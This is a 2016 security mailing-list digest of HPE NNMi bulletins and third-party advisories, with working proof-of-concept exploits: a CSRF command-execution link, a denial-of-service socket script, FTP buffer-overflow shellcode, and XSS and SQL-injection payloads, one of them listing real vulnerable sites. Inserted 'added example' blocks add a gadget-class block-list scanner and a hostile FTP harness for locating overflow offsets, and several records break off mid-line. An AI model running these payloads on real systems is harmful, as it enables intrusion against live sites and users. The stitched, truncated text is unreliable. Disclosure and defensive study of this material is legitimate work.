[security bulletin] HPSBGN03657 rev.1 - HPE Network Node Manager i (NNMi) Software, Local Code Execution

2016-11-08 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05325811

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05325811
Version: 1

HPSBGN03657 rev.1 - HPE Network Node Manager i (NNMi) Software, Local Code
Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-11-04
Last Updated: 2016-11-04

Potential Security Impact: Local: Code Execution

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability was identified in HPE Network Node Manager
i (NNMi) Software. The vulnerability could result in local code execution.

References:

  - CVE-2016-4397 - local execution of code
  - PSRT110236

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE Network Node Manager I (NNMi) Software 10.00, 10.10, 10.20

BACKGROUND

  CVSS Base Metrics
  =================
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-4397
  4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
  4.3 (AV:L/AC:L/Au:S/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has provided the following product updates to resolve the vulnerability
in HPE Network Node Manager i (NNMi) Software:

* Network Node Manager i 10.00:

  + Windows:


* Network Node Manager i 10.10:

  +


* Network Node Manager i 10.20:
 
  +


  *NOTE:* Users should run changeUser.ovpl after the patches have been
applied.

HISTORY
Version:1 (rev.1) - 4 November 2016 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCAAGBQJYHMlSAAoJELXhAxt7SZaimVQIAJ3vJ6aeUZpEaxWt8ttj/1p6
roI+0giZQgRi5d9II3+Ma+rHk9mnCXp+wQEoMXNF7Fn7GJxS2SRe95znBC1zJ5tM
/oKlhhMZKRlKNiHEty30C71QVbxvVOm/R+VeW+qDuMl5HVBne0+TxeOr3adwXjYg
OFw5W3v1a6K4D4evQQ62ysPlJ35+e8rIXZwTreBgW57Fn8EG/lUqigg+zHWZM/vA
eni7AzYe15OeN3H2/znTiZPQ8yi6DcQ1rrqDN3wYGn6kLEEWM960bJ02jdPHArcl
t/cGZa43xui0yEFtYDJY5e3HHZry6ZTLYaZKbh7bX+ysTNWt4pGZLInZi9k51TA=
=XiVl
-END PGP SIGNATURE-


[security bulletin] HPSBGN03656 rev.1 - HPE Network Node Manager i (NNMi) Software using Java Deserialization, Remote Arbitrary Code Execution and Cross-Site Scripting

2016-11-08 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05325823

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05325823
Version: 1

HPSBGN03656 rev.1 - HPE Network Node Manager i (NNMi) Software using Java
Deserialization, Remote Arbitrary Code Execution and Cross-Site Scripting

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-11-04
Last Updated: 2016-11-04

Potential Security Impact: Remote: Arbitrary Code Execution, Cross-Site
Scripting (XSS)

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Several vulnerabilities are addressed in this security bulletin: 
 
  * Potential security vulnerabilities were identified in HPE Network Node
Manager i (NNMi) Software. These vulnerabilities could result in cross-site
scripting (XSS).

  * A vulnerability in Apache Commons Collections for handling Java object
deserialization was addressed by HPE Network Node Manager i (NNMi) Software.
The vulnerability could be remotely exploited to allow remote code execution.

References:

  - CVE-2016-4398 - Remote Code Execution, VU#576313
  - CVE-2016-4399 - XSS
  - CVE-2016-4400 - XSS
  - PSRT110235

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE Network Node Manager I (NNMi) Software 10.00, 10.01 (patch1), 10.01
(patch 2), 10.10

BACKGROUND

  CVSS Base Metrics
  =================
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-4398
  8.8 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
  9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)

CVE-2016-4399
  4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L
  6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)

CVE-2016-4400
  4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L
  6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has provided the following product updates to resolve the vulnerabilities
in HPE Network Node Manager i (NNMi) Software:

 * Network Node Manager i 10.00:
 
  + Linux:

  + Windows:


* Network Node Manager i 10.10:
 
  + Linux:

  + Windows:


HISTORY
Version:1 (rev.1) - 4 November 2016 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be tra
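
Added example, not part of the HPE bulletin or of NNMi: a Python scanner that validates the header of a Java serialization stream and lists the classes it declares, refusing the stream when any class comes from the Apache Commons Collections functors package in which the public gadget chains (InvokerTransformer and friends) live. The bulletin names only the library, so the block list, the constant names and the build_stream() sample stream are this example's assumptions; the scan is a heuristic over TC_CLASSDESC markers, not a full parser of the protocol.

```python
import struct

STREAM_MAGIC = 0xACED          # every Java serialization stream starts ac ed 00 05
STREAM_VERSION = 0x0005
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72
TC_ENDBLOCKDATA = 0x78
TC_NULL = 0x70
SC_SERIALIZABLE = 0x02

# Assumption of this example: the package that holds the Commons Collections
# functor classes used by the well-known deserialization gadget chains.
BLOCKED_PREFIXES = (
    "org.apache.commons.collections.functors.",
    "org.apache.commons.collections4.functors.",
)

_NAME_CHARS = frozenset(
    b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._$[;/"
)


def _plausible_class_name(raw: bytes) -> bool:
    return 0 < len(raw) <= 255 and all(b in _NAME_CHARS for b in raw)


def class_names(stream: bytes) -> list:
    """Heuristically list the class names declared by TC_CLASSDESC records.

    Only the 4-byte header is parsed strictly. The rest is scanned for the
    TC_CLASSDESC marker followed by a big-endian UTF length and a plausible
    class name, which is enough to spot a gadget class before an
    ObjectInputStream would instantiate it.
    """
    if len(stream) < 4:
        raise ValueError("stream too short for a Java serialization header")
    magic, version = struct.unpack(">HH", stream[:4])
    if magic != STREAM_MAGIC or version != STREAM_VERSION:
        raise ValueError("not a Java serialization stream (bad magic/version)")
    found = []
    i = 4
    while i < len(stream):
        if stream[i] == TC_CLASSDESC and i + 3 <= len(stream):
            (length,) = struct.unpack(">H", stream[i + 1:i + 3])
            raw = stream[i + 3:i + 3 + length]
            if len(raw) == length and _plausible_class_name(raw):
                found.append(raw.decode("ascii"))
                i += 3 + length        # skip the name so its bytes are not rescanned
                continue
        i += 1
    return found


def first_blocked_class(stream: bytes):
    """Return the first declared class that matches a blocked prefix, or None."""
    for name in class_names(stream):
        if name.startswith(BLOCKED_PREFIXES):
            return name
    return None


def build_stream(names) -> bytes:
    """Constructed sample: a minimal stream with one TC_OBJECT/TC_CLASSDESC pair
    per name and zero fields. No JVM wrote this; it only exercises the scanner."""
    out = bytearray(struct.pack(">HH", STREAM_MAGIC, STREAM_VERSION))
    for name in names:
        raw = name.encode("ascii")
        out.append(TC_OBJECT)
        out.append(TC_CLASSDESC)
        out += struct.pack(">H", len(raw)) + raw
        out += b"\x00" * 8                 # serialVersionUID (zero in this sample)
        out.append(SC_SERIALIZABLE)        # classDescFlags
        out += struct.pack(">H", 0)        # field count
        out.append(TC_ENDBLOCKDATA)        # end of class annotation
        out.append(TC_NULL)                # no superclass descriptor
    return bytes(out)
```

A scan like this is a pre-filter at the network or file boundary. The durable fix is a class allow-list enforced at deserialization time (ObjectInputFilter, available since Java 9 and backported to 8u121) together with a Commons Collections release that disables serialization of the unsafe functors (3.2.2 and later).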

Rapid PHP Editor CSRF Remote Command Execution

2016-11-08 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/RAPID-PHP-EDITOR-REMOTE-CMD-EXEC.txt

[+] ISR: Apparition Security



Vendor:
==
www.rapidphpeditor.com



Product:
===
Rapid PHP Editor IDE
rapidphp2016.exe v14.1


Rapid PHP editor is a faster and more powerful PHP editor for Windows combining 
features of a fully-packed PHP IDE with 
the speed of the Notepad. Rapid PHP is the most complete all-in-one software 
for coding PHP, HTML, CSS, JavaScript and
other web development languages with tools for debugging, validating, reusing, 
navigating and formatting your code.



Vulnerability Type:
=
CSRF Remote Command Execution



CVE Reference:
==
N/A



Vulnerability Details:
=

There is a Remote Command Execution ailment in this IDE: if a user of this IDE 
is running the internal debug server
listening on localhost port 89 and they open a link or visit a malicious 
webpage, then remote attackers can execute arbitrary
commands on the victim's system.

Reference:
http://forums.blumentals.net/viewtopic.php?f=15&t=7062


Exploit code(s):


Call Windows "calc.exe" as POC

<a href="http://127.0.0.1:89/~C/Windows/system32/calc.exe">Click it!</a>

OR

<form action="http://127.0.0.1:89/~C/Windows/system32/calc.exe" method="post">
</form>
<script>document.forms[0].submit()</script>




Disclosure Timeline:
=
Vendor notification:  October 5, 2016
Vendor confirms vulnerability: October 7, 2016
Vendor releases fixed version: November 1, 2016
November 2, 2016 : Public Disclosure




Severity Level:

High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx


Axessh 4.2.2 Denial Of Service

2016-11-08 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt

[+] ISR: ApparitionSec



Vendor:

www.labf.com



Product:
=
Axessh 4.2.2

Axessh is a SSH client. It is a superb terminal emulator/telnet client for 
Windows. It provides SSH capabilities to Axessh without
sacrificing any of existing functionality. Furthermore, Axessh has been 
developed entirely outside of the USA, and can be sold
anywhere in the world (apart from places where people aren't allowed to own 
cryptographic software).

2. Axessh features include:
Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4)
Compatible with SSH protocol version 1.5
Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4
Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, 
AES256-cbc
Authentication using password
Authentication RSA
Compression support
Connection forwarding, including full support for X-protocol connection 
forwarding
"Dynamic Forwarding" which provides other tasks on the same PC with requested 
port forwarding 



Vulnerability Type:

Denial Of Service

AxeSSH will crash after receiving an overly long payload of junk...



Exploit code(s):
===

1) Open the settings window for axessh and choose Run, then click Run as EXE; 
this will launch "xwpsshd.exe".
It crashes with "bad protocol version".


import socket

print("Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service")

ip = input("[IP]> ")
port = 22
payload = b"A" * 2000          # overly long junk instead of an SSH version string
s = socket.create_connection((ip, port))
s.sendall(payload)
s.close()



Exploitation Technique:
===
Remote



Severity Level:

Medium



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx


WinaXe v7.7 FTP 'Server Ready' CMD Remote Buffer Overflow

2016-11-08 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt

[+] ISR: Apparition Security



Vendor:

www.labf.com



Product:

WinaXe v7.7 FTP 

The X Window System, SSH, TCP/IP, NFS, FTP, TFTP and Telnet software are built 
and provided in the package.
All that you need to run remote UNIX and X Applications is included within 
WinaXe Plus. You operate simultaneously with
X11, FTP and Telnet sessions and with your familiar MS Windows applications.



Vulnerability Type:
===
Remote Buffer Overflow



Vulnerability Details:
==

WinaXe v7.7 FTP client is subject to MULTIPLE remote buffer overflow vectors 
when connecting to a malicious FTP Server and
receiving overly long payloads in the command response from the remote server.

220 SERVICE READY 
331 USER / PASS
200 TYPE
257 PWD

etc...

Below is a POC for the "Service Ready" 220 reply, which the server sends when 
a client first connects to it.


Exploit code(s):
===

import socket,struct

#WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit
#Discovery hyp3rlinx
#ISR: ApparitionSec
#hyp3rlinx.altervista.org


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


eip=struct.pack('
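
Added example, not the advisory's exploit and not vendor code: a Python harness for the technique the advisory describes, a hostile FTP server whose 220 "Service Ready" banner is overlong. Instead of shellcode it sends a cyclic pattern (the pattern_create scheme), so the value that lands in EIP at the crash can be mapped back to an offset in the banner; that is the step that precedes choosing the return address the truncated PoC above packs. The listening port 2121, the 3000-byte banner size and the function names are this example's assumptions.

```python
import socket
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Non-repeating Upper/lower/digit triplets, so any four bytes that land in
    a register map back to exactly one offset in the buffer."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern longer than 20280 bytes would repeat")
    out = bytearray()
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                out += (up + lo + dg).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern: bytes, register_value: int) -> int:
    """Offset in `pattern` of a 32-bit little-endian register value (e.g. the
    EIP the debugger shows at the crash), or -1 if it is not in the pattern."""
    return pattern.find(struct.pack("<I", register_value))


def ftp_reply(code: int, text: bytes) -> bytes:
    """Single-line FTP control reply as RFC 959 formats it: '<code> <text>\\r\\n'."""
    return b"%d %s\r\n" % (code, text)


def serve_banner(banner: bytes, host: str = "0.0.0.0", port: int = 2121) -> None:
    """Hostile FTP server: accept a client, send the overlong 220 banner, read
    whatever the client answers (its USER line, if it survives) and close.
    Loops until interrupted."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        while True:
            conn, _peer = srv.accept()
            with conn:
                conn.sendall(banner)
                conn.settimeout(2.0)
                try:
                    conn.recv(1024)
                except socket.timeout:
                    pass


if __name__ == "__main__":
    # 3000 bytes is an assumed size; tune it to the client under test.
    serve_banner(ftp_reply(220, cyclic_pattern(3000)))
```

Point the FTP client at the harness, note the EIP value in the debugger when it faults, and pattern_offset() gives the position in the banner where the saved return address sits; the same banner builder serves the other replies the advisory lists (331, 200, 257) by changing the code.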

Faraznet Cms Cross-Site Scripting Vulnerability

2016-11-08 Thread iedb . team
Cross-Site Scripting in Faraznet Cms Version 4.x


###

# Faraznet Cms Cross-Site Scripting Vulnerability

###

#

# Iranian Exploit DataBase And Security Team - iedb.ir

# Title : Faraznet Cms Cross-Site Scripting Vulnerability

# Vulnerability : Cross-Site Scripting (xss)

# Vulnerability on : s_search.php

# Version : 4.x

# Dork : "Designed By Faraznet"

# Vendor site : http://www.faraznet.net

# Author : IeDb.Ir

# Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir

# Vulnerability attack information site : http://xssed.Ir

Telegram : https://telegram.me/joinchat/BdNXvD3FrFLG8tVtIfTjaQ

Email : iedb.t...@gmail.com

# Archive Exploit : http://iedb.ir/exploits-6119.html

#

# Bug :

http://www.site.com/en/s_search.php

Post Script : '"alert(/Iedb.Ir/)

# Dem0 [ Xss ]

http://ijssh.com/en/s_search.php

http://www.intjournalssm.com/en/s_search.php

http://www.sjsmjournal.com/en/s_search.php

http://www.irjabs.com/en/s_search.php

http://geo-tech.iauzah.ac.ir/en/s_search.php

http://www.nafasjournal.ir/en/s_search.php

#

Thanks To : All Members In Iedb.ir And Iedb.ir/acc And Xssed.ir

#

# Archive Exploit = http://iedb.ir/exploits-6119.html

#

###

# Iranian Exploit DataBase = http://IeDb.Ir [2016-11-07]

###



Edusson (Robotdon) BB - Filter Bypass & Persistent Vulnerability

2016-11-08 Thread Vulnerability Lab
Document Title:
===
Edusson (Robotdon) BB - Filter Bypass & Persistent Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1870


Release Date:
=
2016-11-03


Vulnerability Laboratory ID (VL-ID):

1870


Common Vulnerability Scoring System:

4.3


Product & Service Introduction:
===
Meet Robot Don - a free essay checker software that brings so much fun into 
your essay editing / proofreading.
We have created Robot Don, machine learning tool that facilitates essay 
writing, free for all students. We continuously 
receive bug reports and suggestions from different areas. To honor the bright 
external contributions that help us 
build a better product we have  launched a Bug & Ideas Hunting (BIH) Contest 
for Robot Don. Any of service or feature 
provided by Robot Don software is intended to be in scope of this scholarship/ 
contest. This includes all content and 
algos available through robotdon.com

(Copy of the Vendor Homepage: http://edusson.com/robot-don )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered an application-side 
vulnerability and a filter bypass issue in the official Edusson Robotdon 
web-application.


Vulnerability Disclosure Timeline:
==
2016-06-10: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2016-06-11: Vendor Notification (Edusson Security Team)
2016-06-20: Vendor Response/Feedback (Edusson Security Team)
2016-**-**: Vendor Fix/Patch (Edusson Robotdon Developer Team)
2016-11-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Edusson
Product: Robotdon - Online Service (Web-Application) 2016 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

An application-side input and mail encode web vulnerability has been discovered 
in the official Edusson Robotdon (tools) web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
to the application-side of the vulnerable module or function.

The vulnerability is located in the reg_name parameter of the ./register module 
POST method request. Remote attackers are able to inject their own 
malicious script code into the email body context of the i...@robotdon.com reply 
notification. The injection point of the vulnerability is the 
registration form with the incorrectly encoded name input field. The execution 
point occurs in the email that is sent by the service after the 
registration has been completed. The attack vector of the vulnerability is 
persistent on the application-side and the request method to inject 
the payload is POST. The vulnerability allows an attacker to inject malicious 
code into the email context to spoof, phish or manipulate 
the original email reply. The payload is saved to the database 
management system and can execute with a persistent vector in 
other notifications as well. 

The security risk of the application-side vulnerability is estimated as medium 
with a cvss (common vulnerability scoring system) count of 4.3. 
Exploitation of the persistent mail encode web vulnerability requires no 
privileged user account and only low user interaction (click/include). 
Successful exploitation of the vulnerability results in persistent phishing 
mails, session hijacking, persistent external redirect to malicious 
sources and application-side manipulation of affected or connected module 
context.

Request Method(s):
[+] POST

Vulnerable Module(s)
[+] ./register (robotdon)
 
Vulnerable Input(s):
[+] Name

Vulnerable Parameter(s)
[+] reg_name

Affected Module(s)
[+] Mail Message Body


Proof of Concept (PoC):
===
The persistent input and mail encode web vulnerability can be exploited by 
remote attackers without user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


Vulnerable Input(s): (Inject)
http://tools.robotdon.com/registered
http://tools.robotdon.com/register


PoC: Payload(s)
"" >"http://tools.robotdon.com/registration Load Flags[LOAD_BACKGROUND  
LOAD_BYPASS_LOCAL_CACHE  ] Content size[-1] Mime Type[text/html]
   Request Header:
  Host[tools.robotdon.com]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 
Firefox/46.0]
  Accept[text/plain, */*; q=0.01]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  DNT[1

Edusson (Robotdon) - Client Side Cross Site Scripting Vulnerability

2016-11-08 Thread Vulnerability Lab
Document Title:
===
Edusson (Robotdon) BB - Client Side Cross Site Scripting Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1871


Release Date:
=
2016-11-04


Vulnerability Laboratory ID (VL-ID):

1871


Common Vulnerability Scoring System:

3.4


Product & Service Introduction:
===
Meet Robot Don - a free essay checker software that brings so much fun into 
your essay editing / proofreading.
We have created Robot Don, machine learning tool that facilitates essay 
writing, free for all students. We continuously 
receive bug reports and suggestions from different areas. To honor the bright 
external contributions that help us 
build a better product we have  launched a Bug & Ideas Hunting (BIH) Contest 
for Robot Don. Any of service or feature 
provided by Robot Don software is intended to be in scope of this scholarship/ 
contest. This includes all content and 
algos available through robotdon.com

(Copy of the Vendor Homepage: http://edusson.com/robot-don )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a client-side cross 
site scripting web vulnerability in the official Edusson Robotdon 
web-application.


Vulnerability Disclosure Timeline:
==
2016-06-10: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2016-06-11: Vendor Notification (Edusson Security Team)
2016-06-20: Vendor Response/Feedback (Edusson Security Team)
2016-**-**: Vendor Fix/Patch (Edusson Robotdon Developer Team)
2016-11-04: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Edusson
Product: Robotdon - Online Service (Web-Application) 2016 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A client-side cross site scripting web vulnerability has been discovered in the 
official Edusson RobotDon (Tools) online service web-application.
The non-persistent vulnerability allows remote attackers to inject own 
malicious script codes on client-side browser to web-application requests.

The vulnerability is located in the keyword parameter of the relevancy module 
POST method request. Remote attackers are able to inject own 
malicious script codes to the Check  input context with the vulnerable keyword 
parameter. The injection point of the vulnerability is the 
Check input form with the wrong encoded keyword parameter. The execution point 
occurs in the error exception-handling of the check module 
within the displayed invalid context. The attack vector of the vulnerability 
is non-persistent on the client-side and the request method 
to inject the payload is POST. The vulnerability allows an attacker to inject 
malicious code into the non-protected queue of the check with 
the vulnerable exception. The error code is marked with an automated notice 
to report the error (alert alert-danger ps fix!), which has 
been resolved by this report.

The security risk of the client-side vulnerability is estimated as medium with 
a cvss (common vulnerability scoring system) count of 3.4. 
Exploitation of the non-persistent web vulnerability requires a low 
privileged user account and only low user interaction (click). 
Successful exploitation of the vulnerability results in non-persistent 
phishing, session hijacking, non-persistent external redirect to 
malicious sources and client-side manipulation of affected or connected module 
context.

Request Method(s):
[+] POST

Vulnerable Module(s)
[+] Relevancy (robotdon)
 
Vulnerable Input(s):
[+] Check

Vulnerable Parameter(s)
[+] keyword

Affected Module(s)
[+] Exception-Handling - Message Context on 
Error


Proof of Concept (PoC):
===
The non-persistent cross site web vulnerability can be exploited by remote 
attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ... 
1. Open the company website and login to your low privileged user account
2. Click the Relevancy module
3. Inject the test payload to the input field
4. Click the check button to process the POST method request
5. The code executes in the exception of the invalid keyword input within the 
website context
6. Successful reproduce of the vulnerability


PoC: Vulnerable Source
Text is not relevant specified word. Word 
>"http://www.vulnerability-lab.com"; 
onload="alert(doc

Schoolhos CMS v2.29 - (kelas) Data Siswa SQL Injection Vulnerability

2016-11-08 Thread Vulnerability Lab
Document Title:
===
Schoolhos CMS v2.29 - (kelas) Data Siswa SQL Injection Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1931


Release Date:
=
2016-11-07


Vulnerability Laboratory ID (VL-ID):

1931


Common Vulnerability Scoring System:

6.7


Product & Service Introduction:
===
Schoolhos CMS is alternative to developing School Website. It's Free and Open 
Source under GPL License. Easy to install, user friendly and elegant design.

(Copy of the Vendor Homepage: http://www.schoolhos.com/  &  
https://sourceforge.net/projects/schoolhoscms/ )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a remote 
sql-injection vulnerability in the official Schoolhos v2_29 content management 
system.


Vulnerability Disclosure Timeline:
==
2016-11-07: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A remote sql injection web vulnerability has been discovered in the official 
Schoolhos v2_29 content management system.
The web vulnerability allows remote attackers to execute own malicious sql 
commands to compromise the application or dbms. 

The sql injection vulnerability is located in the `kelas` parameter of the 
`index?p=siswakelas` module POST method request. 
Remote attackers are able to execute own sql commands by usage of an insecure 
post method request through the vulnerable 
parameter of the own application. The attack vector of the vulnerability is 
application-side and the request method to 
inject is POST. The security vulnerability in the content management system is 
a classic select remote sql-injection.

The security risk of the vulnerability is estimated as high with a cvss (common 
vulnerability scoring system) count of 6.7.
Exploitation of the remote sql injection vulnerability requires no user 
interaction or privileged web-application user account.
Successful exploitation of the remote sql injection results in database 
management system, web-server and web-application compromise.

Request Method(s): 
[+] POST
   
Vulnerable Module(s):
[+] ./SCRIPTPATH/index.php?p=siswakelas

Vulnerable Parameter(s):
[+] kelas 


Proof of Concept (PoC):
===
The remote sql-injection web vulnerability can be exploited by remote attackers 
without privileged web-application user account and without user interaction.
For security demonstration or to reproduce the sql-injection web vulnerability 
follow the provided information and steps below to continue.


-- PoC Session Logs ---
[+] Place: POST > Parameter: kelas

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: kelas=1' AND 4945=4945 AND 'SfWY'='SfWY

Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
